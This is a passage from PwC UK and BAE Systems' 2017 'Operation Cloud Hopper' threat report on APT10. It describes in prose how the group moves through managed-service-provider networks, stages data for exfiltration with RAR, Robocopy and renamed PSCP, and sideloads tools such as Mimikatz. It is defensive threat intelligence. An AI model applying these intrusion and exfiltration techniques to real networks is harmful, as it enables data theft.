882. respectively. For example, in addition to compromising high
883. value domain controllers and security servers, the threat actor
884. has also been observed identifying and subsequently
885. installing malware on low profile systems that provide
886. non-critical support functions to the business, and are thus
887. less likely to draw the attention of system administrators.
888. As part of the long-term access to victim networks, we have
889. observed APT10 consistently install updates and new
890. malware on compromised systems. In the majority of
891. instances APT10 used either a reverse shell or RDP connection
892. to install its malware; the actor also uses these methods to
893. propagate across the network.
894. Communication checks are usually conducted using native
895. Windows tools such as ping.exe, net.exe and tcping.exe. The
896. actor will frequently ‘net use’ to several machines within
897. several seconds, connecting for as little as five seconds, before
898. disconnecting. Further details are provided in Annex B.
899. Network hopping and
900. exfiltration
901. Once APT10 have a foothold in victim networks, using either
902. legitimate MSP or local domain credentials, or their sustained
903. malware such as PlugX, RedLeaves or Quasar RAT, they will
904. begin to identify systems of interest.
905. The operator will either access these systems over RDP, or
906. browse folders using Remote Access Trojan (RAT)
907. functionality, to identify data of interest. This data is then
908. staged for exfiltration in multi-part archives, often placed in
909. the Recycle Bin, using either RAR or TAR. The compression
910. tools are often launched via a remote command execution
911. script which is regularly named ‘t.vbs’ and is a customised
912. version of an open source WMI command executor which
913. pipes the command output back to the operator.
914. We have observed these archives being moved outside of the
915. victim networks, either back into to the MSP environments or
916. to external IP addresses in two methods, which are also
917. performed via the command line using t.vbs:
918. 1. Mounting the target external network share with ‘net use’
919. and subsequently using the legitimate Robocopy tool to
920. transfer the data; and,
921. 2. Using the legitimate Putty Secure Copy Client (PSCP),
922. sometimes named rundll32.exe, to transfer the data
923. directly to the third party system.
924. Using these techniques, APT10 ‘pushes’ data from victim
925. networks to other networks they have access to, such as other
926. MSP or victim networks, then, using similar methods, ‘pulls’
927. the data from those networks to locations from which they
928. can directly obtain it, such as the threat actor’s C2 servers.
929. APT10’s ability to bridge networks can therefore be
930. summarized as:
931. • Use of legitimate MSP credentials to management systems
932. which bridge the MSP and multiple MSP customer
933. networks;
934. • Use of RDP to interactively access systems in both the MSP
935. management network and MSP customer networks;
936. • Use of t.vbs to execute command line tools; and,
937. • Use of PSCP and Robocopy to transfer data.
938. APT10 malware
939. We classify APT10’s malware into two distinct areas: tactical
940. and sustained. The tactical malware, historically EvilGrab,
941. and now ChChes (and likely also RedLeaves), is designed to be
942. lightweight and disposable, often being delivered through
943. spear phishing. Once executed, tactical malware contains the
944. capability to profile the network and manoeuvre through it to
945. identify a key system of interest. The sustained malware,
946. historically Poison Ivy, PlugX and now Quasar provides a more
947. comprehensive feature set. Intended to be deployed on key
948. systems, the sustained malware facilitates long-term remote
949. access and allows for operators to more easily carry out
950. administration tasks.
951. Since late 2016, we have seen the threat actor develop several
952. bespoke malware families, such as ChChes and RedLeaves.
953. Additionally, it has taken the open source malware, Quasar,
954. and extended its capabilities, ensuring the incrementation of
955. the internal version number as it does so.
956. We have also observed APT10 use DLL search order hijacking
957. and sideloading, to execute some modified versions of
958. open-source tools. For example, PwC UK has observed APT10
959. compiling DLLs out of tools, such as MimiKatz and PwDump6,
960. and using legitimate, signed software, such as Windows
961. Defender to load the malicious payloads.
962. In Annex B we provide detailed analysis of several of the
963. threat actor’s tools as well as the common Windows tools we
964. have observed being used.
965. Operation Cloud Hopper 19
966. Timeline
967. Figure 17: Timeline of APT10 malware use
968. 16 https://github.com/quasar/QuasarRAT
969. 2009 2010 2011 2012 2013 2014 2015 2016 2017
970. Poison Ivy
971. PlugX
972. EvilGrab
973. ChChes
974. Quasar
975. RedLeaves
976. Retooling Efforts
977. Alongside APT10’s TTPs, we have observed a ‘retooling’ cycle.
978. Given the pace of technological change and the wide range of
979. freely available online tools and scripts, it is not unusual for
980. an actor to re-evaluate its capabilities and to benchmark
981. multiple offerings against each other. We have observed a
982. decline in the deployment of some of APT10’s traditional core
983. tool set, and witnessed an increase in the development and
984. deployment of additional new tools which combine in-house
985. development and open source projects. We assess that this is
986. highly likely due to the public release of APT10 malware by
987. cyber security vendors.
988. Throughout our investigations, we have observed multiple
989. deployments of the PlugX malware from 2014 to at least 2016.
990. This, along with the downturn in the use of Poison Ivy,
991. supports the notion that a major retooling operation took
992. place post 2014. Additional analysis of the infrastructure
993. associated with each distinct version of PlugX also shows an
994. increase in maturity over time. Earlier PlugX versions were
995. configured with legacy domains and IP addresses, which were
996. originally isolated and more obvious, whereas more recent
997. versions have demonstrated a standardised convention for
998. domain names and IP selection.
999. During our analysis of victim networks, we were able to
1000. observe APT10 once again initiate a retooling cycle in late
1001. 2016. We observed the deployment and testing of multiple
1002. versions of Quasar malware,16 and the introduction of the
1003. bespoke malware families ChChes and RedLeaves.
1004. We assess it is highly likely that due to the frequent public
1005. release of information linking PlugX with China-based threat
1006. actors, continual long-term use had become unsustainable,
1007. introducing an additional operational overhead that is easily
1008. attributable to China-based threat actors.
1009. 20 Operation Cloud Hopper
1010. Conclusion
1011. APT10 is a constantly evolving, highly
1012. persistent China-based threat actor that
1013. has an ambitious and unprecedented
1014. collection programme against a broad
1015. spectrum of sectors, enabled by its
1016. strategic targeting.
1017. Since exposure of its operations in 2013, APT10 has made a
1018. number of significant changes intended to thwart detection of
1019. its campaigns. PwC UK and BAE Systems, working closely
1020. with industry and government, have uncovered a new,
1021. unparallelled campaign which we refer to as Operation Cloud
1022. Hopper. This operation has targeted managed IT service
1023. providers, the compromise of which provides APT10 with
1024. potential access to thousands of further victims. An additional
1025. campaign has also been observed targeting Japanese entities.
1026. APT10’s malware toolbox shows a clear evolution from
1027. malware commonly associated with China-based threat actors
1028. towards bespoke in-house malware that has been used in
1029. more recent campaigns; this is indicative of APT10’s
1030. increasing sophistication, which is highly likely to continue.
1031. The threat actor’s known working hours align to Chinese
1032. Standard Time (CST) and its targeting corresponds to that of
1033. other known China-based threat actors, which supports our
1034. assessment that these campaigns are conducted by APT10.
1035. This campaign serves to highlight the importance of
1036. organisations having a comprehensive view of their threat
1037. profile, including that of their supply chain’s. More broadly,
1038. it should also encourage organisations to fully assess the
1039. risk posed by their third party relationships, and prompt
1040. them to take appropriate steps to assure and manage these.
1041. A detailed technical annex supplements this main report,
1042. which provides further information about the tools and
1043. techniques used by APT10 and contains Indicators of
1044. Compromise relating to all of this threat actor’s known
1045. campaigns. These have already been provided to the National
1046. Cyber Security Centre for dissemination through their usual
1047. channels.
1048. Operation Cloud Hopper 21
1049. Appendices
1050. 22 Operation Cloud Hopper
1051. Appendix A
1052. Collaboration between PwC UK and BAE Systems
1053. PwC and BAE Systems’ respective Threat Intelligence teams share a mutual interest in new cyber threats. PwC and BAE
1054. Systems partnered through their membership of the Cyber Incident Response (CIR) scheme to share intelligence and develop
1055. the most comprehensive picture possible of this threat actor’s activities. Information sharing like this underpins the security
1056. research community and serves to aid remediation and inform decisions that companies make about their security needs.
1057. Probabilistic language
1058. Interpretations of probabilistic language (for example, “likely” or “almost certainly”) vary widely, and to avoid
1059. misinterpretation we have used the following qualitative terms within this report when referring to the level of confidence we
1060. have in our assessments. Unless otherwise stated, our assessments are not based on statistical analysis.
1061. Qualitative term Associated probability range
1062. Remote or highly likely Less than 10%
1063. Improbable or unlikely 10-25%
1064. Realistic probability 26-50%
1065. Probable or likely 51-75%
1066. Highly probable or highly likely 76-90%
1067. Almost certain More than 90%
1068. Operation Cloud Hopper 23
1069. Appendix B
1070. PwC UK reporting
1071. PwC UK Threat Intelligence has previously published a range
1072. of APT10 related reporting, both in the public domain and via
1073. our subscription service. These reports are as follows:
1074. • APT10 resumes operations with a vengeance, in
1075. Threats Under the Spotlight – CTO-TUS-20170321-01A
1076. • NetEaseX and the Secret Key to Lisboa – CTO-TIB-
1077. 20170313-01A – BlackDLL
1078. • APT10’s .NET Foray – CTO-TIB-20170301-01B – Quasar
1079. • APT10 pauses for Chinese New Year, in Threats Under
1080. the Spotlight – CTO-TUS-20170220-01A
1081. • CVNX’s sting in the tail – CTO-TIB-20170123-01A –
1082. ChChes (Scorpion) Malware
1083. • China and Japan: APT to dispute -CTO-SIB-20170119-
1084. 01A
1085. • Taiwan Presidential Election: A Case Study on
1086. Thematic Targeting, http://pwc.blogs.com/cyber_
1087. security_updates/2016/03/taiwant-election-targetting.
1088. html, published 2016-03-17. Overview of EvilGrab and it
1089. being used against Asian targets, specifically around the
1090. 2016 Taiwanese election
1091. • Scanbox II – CTO-TIB-20150223-01A
1092. • “IST-Red Apollo-002 – Red Apollo Tearsheet”
1093. Third party reports
1094. A number of organisations have also published related
1095. reporting, as follows:
1096. • RedLeaves – Malware Based on Open Source RAT
1097. – http://blog.jpcert.or.jp/2017/04/redleaves---malwarebased-on-open-source-rat.html
1098. – Further technical
1099. reporting on RedLeaves, revealing links to an open source
1100. RAT.
1101. • The relevance between the attacker group menuPass
1102. and malware (Poison Ivy, PlugX, ChChes), https://
1103. www.lac.co.jp/lacwatch/people/20170223_001224.html,
1104. published 2017-02-23. Links APT10 to ChChes, Poison Ivy
1105. and PlugX.
1106. • menuPass Returns with New Malware and New
1107. Attacks Against Japanese Academics and
1108. Organizations, http://researchcenter.paloaltonetworks.
1109. com/2017/02/unit42-menupass-returns-new-malwarenew-attacks-japanese-academics-organizations/,
1110.  
1111. published 2017-02-16. APT10 attacks on Japanese
1112. academics. Includes info on ChChes (technical), Poison Ivy
1113. and PlugX.
1114. • ChChes – Malware that Communicates with C&C
1115. Servers Using Cookie Headers, http://blog.jpcert.or.
1116. jp/2017/02/chches-malware--93d6.html, published
1117. 2017-02-15. Technical overview of ChChes malware with
1118. IOCs.
1119. • PlugX TrendMicro “tearsheet”, https://www.
1120. trendmicro.com/vinfo/us/threat-encyclopedia/malware/
1121. plugx, published 2016-09-07. Technical info and IOCs for
1122. PlugX.
1123. • A Detailed Examination of the Siesta Campaign,
1124. https://www.fireeye.com/blog/
1125. threat-research/2014/03/a-detailed-examination-of-thesiesta-campaign.html,
1126. published 2014-03-12. Provides a
1127. detailed analysis of activity dubbed the Siesta campaign.
1128. • POISON IVY: Assessing Damage and Extracting
1129. Intelligence, https://www.fireeye.com/content/dam/
1130. fireeye-www/global/en/current-threats/pdfs/rpt-poisonivy.pdf,
1131. published 2013-08-21. Technical report on Poison
1132. Ivy and campaigns that have used it, including menuPass.
1133. • EvilGrab Malware Family Used In Targeted Attacks In
1134. Asia, http://blog.trendmicro.com/trendlabs-securityintelligence/evilgrab-malware-family-used-in-targetedattacks-in-asia/,
1135. published 2013-09-18. Technical
1136. overview of EvilGrab.
1137. • CrowdCasts Monthly: You Have an Adversary Problem,
1138. https://www.slideshare.net/CrowdStrike/crowd-castsmonthly-you-have-an-adversary-problem,
1139. published
1140. 2013-10-16, a presentation on Chinese actors including
1141. APT, crime and hacktivist. Includes section on Stone
1142. Panda (APT10).
1143. • PlugX: New Tool For a Not So New Campaign, http://
1144. blog.trendmicro.com/trendlabs-security-intelligence/
1145. plugx-new-tool-for-a-not-so-new-campaign/, published
1146. 2012-09-10. Gives an introduction to PlugX.
1147. • Pulling the Plug on PlugX, https://www.trendmicro.
1148. com/vinfo/us/threat-encyclopedia/web-attack/112/
1149. pulling-the-plug-on-plugx, published 2012-08-04. Gives a
1150. technical overview of PlugX and what it is used for.
1151. About PwC
1152. At PwC, our purpose is to build trust in society and solve important
1153. problems. We’re a network of firms in 157 countries with more than
1154. 223,000 people who are committed to delivering quality in assurance,
1155. advisory and tax services.
1156. PwC UK’s cyber security team is a part of this mission, helping clients
1157. around the world to assess, build and manage their cyber security
1158. capabilities and to identify and respond to incidents through a range
1159. of services including threat intelligence, threat detection and incident
1160. response.
1161. We are BAE Systems
1162. At BAE Systems, we provide some of the world’s most advanced
1163. technology defence, aerospace and security solutions.
1164. At BAE Systems Applied Intelligence, we help nations,
1165. governments and businesses around the world defend
1166. themselves against cybercrime, reduce their risk in the
1167. connected world, comply with regulation, and transform their
1168. operations. We do this using our unique set of solutions,
1169. systems, experience and processes – often collecting and
1170. analysing huge volumes of data.
1171. This publication has been prepared for general guidance on matters of interest only, and does not constitute professional advice. You should not act
1172. upon the information contained in this publication without obtaining specific professional advice. No representation or warranty (express or implied) is
1173. given as to the accuracy or completeness of the information contained in this publication, and, to the extent permitted by law, PricewaterhouseCoopers
1174. LLP, its members, employees and agents do not accept or assume any liability, responsibility or duty of care for any consequences of you or anyone else
1175. acting, or refraining to act, in reliance on the information contained in this publication or for any decision based on it.
1176. © 2017 PricewaterhouseCoopers LLP. All rights reserved. In this document, “PwC” refers to the UK member firm, and may sometimes refer to the PwC
1177. network. Each member firm is a separate legal entity. Please see www.pwc.com/structure for further details.
1178. 170328-155605-GC-UK